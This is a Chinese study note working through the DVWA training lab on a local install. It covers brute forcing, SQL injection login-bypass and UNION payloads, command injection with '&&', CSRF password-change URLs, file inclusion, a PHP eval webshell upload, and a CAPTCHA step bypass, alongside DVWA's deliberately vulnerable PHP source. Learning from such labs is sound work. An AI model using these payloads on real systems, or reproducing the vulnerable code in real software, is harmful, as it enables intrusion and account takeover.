DVWA学习笔记
原来装的DVWA没有认认真真地做一遍,靶场环境也有点问题了,到github上面重新下载了一遍:https://github.com/ethicalhack3r/DVWA
复习常见的高危漏洞,产生,利用,防范的方法
DVWA靶场在本地的搭建不再赘述,网上有很多优秀的博客
将级别设置为Low
第一个模块是Brute Force,暴力破解模块
当输入错误的账号密码时,页面会返回错误信息
当输入正确的账号密码时,页面会返回正确信息
使用burpsuite抓包之后暴力破解账号密码
因为我们不知道账号和密码,所以使用burpsuite->intruder->Cluster bomb选项,对账号密码两个参数进行爆破
但是这样的做法不足之处在于,所有的尝试次数=字典用户名数量X字典密码数量,用户名和密码的数量稍微大一点,运行次数就会非常大,所以在真实环境中,我们尽量手动先对用户名进行测试,查看页面的报错信息,有很多网站都会显示是用户名错误,还是密码错误,以此来判断用户名是否存在,再对存在的用户名专门进行密码爆破,减少了很多不必要的工作量
使用burpsuite自带的用户名和密码字典,其组合数量都达到了三千多万,所以在真实环境中尽量不要采用用户名和密码同时爆破的方法。
这里为了快速看到结果,我改为了爆破账号为admin的密码
根据返回包的不同相应判断密码是否正确,这里可以看到当密码为password的时候返回包长度为4755,可知密码就是password
Request id为0的那个是我第一次登陆的时候,直接设置密码为password,所以也成功登录。
查看Low级别的Brute Force的源代码
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Get username
$user = $_GET[ 'username' ];
// Get password
$pass = $_GET[ 'password' ];
$pass = md5( $pass );
// Check the database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
if( $result && mysqli_num_rows( $result ) == 1 ) {
// Get users details
$row = mysqli_fetch_assoc( $result );
$avatar = $row["avatar"];
// Login successful
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
echo "<pre><br />Username and/or password incorrect.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
可以看到将我们GET输入的账号和md5加密后的密码放入了SQL查询语句进行查询,除此之外没有对登录点进行任何防御,还有这一句
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
可以看到这一句是存在SQL注入漏洞的,我们也可以使用万能密码在登录点进行登录,如构造:
密码构造如 admin' or '1'='1#,密码随便输入,即可绕过密码进行登录
第二个模块是Command Injection,命令注入
这种题目在CTF比赛中遇到过,这里是我们先输入一个ip地址,服务器会为我们ping这个IP地址
先复习一下命令注入的基础知识
命令注入攻击最初被称为Shell命令注入攻击,是由挪威一名程序员在1997年意外发现的。第一个命令注入攻击程序能随意地从一个网站删除网页,就像从磁盘或者硬盘移除文件一样简单。 ——百度百科
命令注入通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞
在命令注入中有很多的特殊符号可以进行利用,达到绕过黑名单和执行任意命令的效果。
管道符 | :连结上个指令的标准输出,做为下个指令的标准输入。
后台工作&: 当要把命令放在后台执行时,在命令的后面加上&,注意是放在完整指令列的最后端,如linux下使用tar进行文件压缩的时候,可能用时会比较长,我们就可以将其放入后台执行:
tar cvfz data.tar.gz data > /dev/null&
逻辑符号&& : 表示and的逻辑符号,当前一个命令执行成功之后,就执行&&后的一条命令
逻辑符号 || : 表示 or 的逻辑符号,当前一个命令执行失败之后,才执行||后的一条命令
在linux和windows下都可以使用&&符号进行命令的连续执行
在这里我们服务器是windows的,所以输入
127.0.0.1 && dir
可以看到不仅执行了ping 127.0.0.1的命令,还显示了当前文件夹下的文件,实现了命令注入
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$target = $_REQUEST[ 'ip' ];
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
echo "<pre>{$cmd}</pre>";
}
?>
查看命令注入 low级别的后端PHP代码
在使用php_uname('s')函数判断了我们的操作系统之后,使用shell_exec函数执行ping 我们输入ip地址的命令,我们输入了恶意数据之后,执行的命令变为了
ping 127.0.0.1 && dir
从而达到了命令注入的效果。
第三个模块是Cross Site Request Forgery (CSRF)
CSRF即跨站请求伪造,也就是可以劫持其他用户去进行一些请求,其危害的严重性由当前这个请求是什么操作来决定
可以看到这里是一个修改密码的页面,需要我们输入新密码
我们将密码修改为password试试,可以看到url变化成为了:
http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#
如果用户的登录信息还没有过期,点击这个链接之后,就会将密码修改为password,攻击者并不能通过CSRF攻击来直接获取用户的账户控制权,也不能直接窃取用户的任何信息。他们能做到的,是欺骗用户的浏览器,让其以用户的名义运行操作。
将管理员的密码重置为admin
http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=Change#
CSRF漏洞主要是用于越权操作,所有的漏洞出现在有权限控制的地方,比如说,管理后台,删除文件之类的,有空的时候可以审计一下CMS,看能不能挖掘一些CSRF的CVE
看一下CSRF low级别的后端代码:
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
检测两次输入的密码是否相同,然后将密码md5加密之后覆盖数据库里面原来的密码值
在Burpsuite中有一个用于实现检测CSRF漏洞的功能,在对Request包右键>Engagement tools>Generate CSRF PoC,其会自动生成一个HTML文件,我们也可以使用burpsuite来利用此漏洞
第四个模块是文件包含漏洞 File Inclusion
如果有红色的提示,需要在php.ini配置文件中将allow_url_include开启为On,然后重启phpstudy
重启之后可以看到红色的警告消失了
文件包含漏洞分为了本地文件包含和远程文件包含,远程文件包含就需要设置allow_url_include=On, 因为服务器开启allow_url_include是一种危险行为,所以现在默认都是未开启的。
相对于本地文件包含,远程文件包含更容易被利用,我们先测试本地文件包含。
点击file1.php文件,可以看到url的变化为:
?page=file1.php
点击file2.php,url变换为:
?page=file2.php
所以很容易想到修改文件名,查看同目录文件夹下不能访问的文件
这里有file4.php,我们修改url为
?page=file4.php
可以看到页面变为了
:-),这正是DVWA的作者想让我们做的,当然,如果存在目录遍历漏洞的话,我们还可以访问网站上的任意文件
在fi文件夹的上一级目录中创建hi.txt文件
构造:
?page=../hi.txt
可以看到目录跳转之后显示了hi.txt文件夹的信息
接下来我们尝试远程文件包含漏洞
在本地创建2.php文件
构造payload为:
?page=http://127.0.0.1/2.php
访问执行了phpinfo(),当然也可以直接远程包含一句话木马。
看一下漏洞的源代码为:
<?php // The page we wish to display $file = $_GET[ 'page' ]; ?>
可以看到对于输入的page文件没有进行任何过滤,成为变量file的值,文件包含后的显示在代码里并没有显示出来。
File Upload
文件上传漏洞,很常见也是能迅速拿到服务器shell的一个漏洞。
常见的连接一句话木马的工具有:中国菜刀,蚁剑,冰蝎。
我们这里还是使用中国菜刀,上传PHP一句话木马chopper.php
<?php @eval($_POST['chopper']);?>
上传后友好地返回了上传路径
菜刀连接之
可以看到已经连接成功。
查看文件上传漏洞的源代码:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
首先获取到文件上传的位置,使用move_uploaded_file() 函数将上传的文件移动到新位置即我们刚才获取到的文件上传位置。
这里并没有对上传的文件是否为木马进行检查,上传成功后返回上传路径以及提示信息。
Insecure CAPTCHA
不安全的验证码,做这个题目之前需要先配置config.ini.php里面的key值,先去谷歌网站上申请key值https://www.google.com/recaptcha/admin,操作很简单,这里就不再赘述。
配置后是这样的
这里是一个修改密码的操作,火狐浏览器抓包出了点问题,直接分析源代码
<?php
if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {
// Hide the CAPTCHA form
$hide_form = true;
// Get input
$pass_new = $_POST[ 'password_new' ];
$pass_conf = $_POST[ 'password_conf' ];
// Check CAPTCHA from 3rd party
$resp = recaptcha_check_answer(
$_DVWA[ 'recaptcha_private_key'],
$_POST['g-recaptcha-response']
);
// Did the CAPTCHA fail?
if( !$resp ) {
// What happens when the CAPTCHA was entered incorrectly
$html .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
$hide_form = false;
return;
}
else {
// CAPTCHA was correct. Do both new passwords match?
if( $pass_new == $pass_conf ) {
// Show next stage for the user
echo "
<pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
<form action=\"#\" method=\"POST\">
<input type=\"hidden\" name=\"step\" value=\"2\" />
<input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
<input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
<input type=\"submit\" name=\"Change\" value=\"Change\" />
</form>";
}
else {
// Both new passwords do not match.
$html .= "<pre>Both passwords must match.</pre>";
$hide_form = false;
}
}
}
if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {
// Hide the CAPTCHA form
$hide_form = true;
// Get input
$pass_new = $_POST[ 'password_new' ];
$pass_conf = $_POST[ 'password_conf' ];
// Check to see if both password match
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the end user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with the passwords matching
echo "<pre>Passwords did not match.</pre>";
$hide_form = false;
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
虽然看上去操作很多,实际上就分为了两步,可以看出来,两个if进入的条件是通过是否点击change和step的数值来决定的,而step数值是我们在抓包的过程中可以进行修改的。
第一个if是检测验证码是否输入正确,输入正确后进入第二个if,进而修改密码。这里的验证码就是为了防止CSRF点击后直接修改密码,添加了输入验证码的判断。
但是不难看出,虽然谷歌的验证码没有问题,但是DVWA服务器后端对于验证码正确与否的判断是由一个用户可以修改的量step来决定的,进而我们可以令step=2,从而构建CSRF攻击。
SQL Injection
sql注入漏洞,危害最大的漏洞之一,实际的漏洞挖掘中也经常遇到,但是因为防火墙和安全狗的原因,即便学习了SQL注入,我们还需要知道怎么绕过过滤,进一步进行SQL注入攻击。同时直接将结果直接回显在页面上的注入也越来越少了,更多的时候我们需要用到盲注来获取数据。
输入ID查看页面的回显。
url为:
http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=5&Submit=Submit#
在id后添加单引号报错
http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1%27&Submit=Submit#
注释掉id后的引号页面正常
http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1%27--+&Submit=Submit#
可以猜测后端的id变量为: '$id' 形式
查看源代码关键处如下:
SELECT first_name, last_name FROM users WHERE user_id = '$id';
使用order by 判断字段数为2
http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1%27%20order%20by%202--+&Submit=Submit#
回显位置判断:
http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1%27%20and%201=2%20union%20select%201,2--+&Submit=Submit#
回显位置为1,2
简单测试一下,查看当前用户和数据库名称
http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1%27%20and%201=2%20union%20select%20user(),database()--+&Submit=Submit#
可以看到已经显示了数据库的名称和用户
